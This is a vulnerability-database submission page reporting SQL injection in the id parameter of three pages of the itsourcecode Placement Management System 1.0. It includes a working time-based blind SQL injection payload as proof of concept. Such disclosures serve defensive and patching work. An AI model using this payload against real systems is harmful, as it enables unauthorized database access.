Submeter #383865: itsourcecode Placement Management System 1.0 SQLiinformação

Títuloitsourcecode Placement Management System 1.0 SQLi
DescriçãoIn the view_company.php, view_drive.php, and view_student.php pages, an id parameter can be passed to query data. However, due to inadequate filtering of the id parameter on these pages, SQL injection vulnerabilities are present. ——————————POC——————————— Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 5490 FROM (SELECT(SLEEP(5)))qDPR) AND 'HyHB'='HyHB
Fonte⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE11-4.md
Utilizador
 Dee.Mirage (UID 71702)
Submissão31/07/2024 16h22 (há 2 anos)
Moderação03/08/2024 08h49 (3 days later)
EstadoAceite
Entrada VulDB273543 [itsourcecode Placement Management System 1.0 view_company.php ID Injeção SQL]
Pontos20

VoltarVisão GeralPróximo

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!